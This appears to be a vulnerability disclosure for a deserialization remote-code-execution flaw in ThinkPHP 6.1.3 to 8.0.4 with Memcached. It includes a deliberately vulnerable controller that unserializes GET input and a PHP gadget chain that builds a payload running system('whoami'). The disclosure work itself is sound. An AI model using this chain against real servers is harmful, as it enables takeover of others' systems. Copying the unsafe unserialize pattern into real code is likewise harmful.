Last updated on September 27, 2024 am
Vulnerability description
A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.
Affects Version
Thinkphp v6.1.3 to v8.0.4
Exploit condition
The thinkphp framework should have installed the Memcached extension.
Vulnerability certificate
- Test environment: php8.0.7+thinkphp8.0.4+memcached3.2.0.
First, add new deserialization endpoint in app\controller\Index.php, such as:
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| <?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController { public function index() { unserialize($_GET['x']); return '<style>*{ padding: 0; margin: 0; }</style><iframe src="' . \think\facade\App::version() . '" width="100%" height="100%" frameborder="0" scrolling="auto"></iframe>'; }
public function hello($name = 'ThinkPHP8') { return 'hello,' . $name; } }
You can generate payload from:
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| <?php namespace think\cache\driver; use think\model\Pivot; class Memcached{ protected $options=[]; function __construct() { $this->options["username"]=new Pivot(); } }
namespace think\model; use think\model; class Pivot extends Model {
namespace think; abstract class Model{ private $data = []; private $withAttr = []; protected $json = []; protected $jsonAssoc = true; function __construct() { $this->data["fru1ts"]=["whoami"]; $this->withAttr["fru1ts"]=["system"]; $this->json=["fru1ts"]; } }
namespace think\route; use think\DbManager; class ResourceRegister { protected $registered = false; protected $resource; function __construct() { $this->registered=false; $this->resource=new DbManager(); } } namespace think; use think\model\Pivot; class DbManager { protected $instance = []; protected $config = []; function __construct() { $this->config["connections"]=["getRule"=>["type"=>"\\think\\cache\\driver\\Memcached","username"=>new Pivot()]]; $this->config["default"]="getRule"; } }
use think\route\ResourceRegister; $r=new ResourceRegister(); echo urlencode(serialize($r));
Use the payload to deserialize can result to RCE: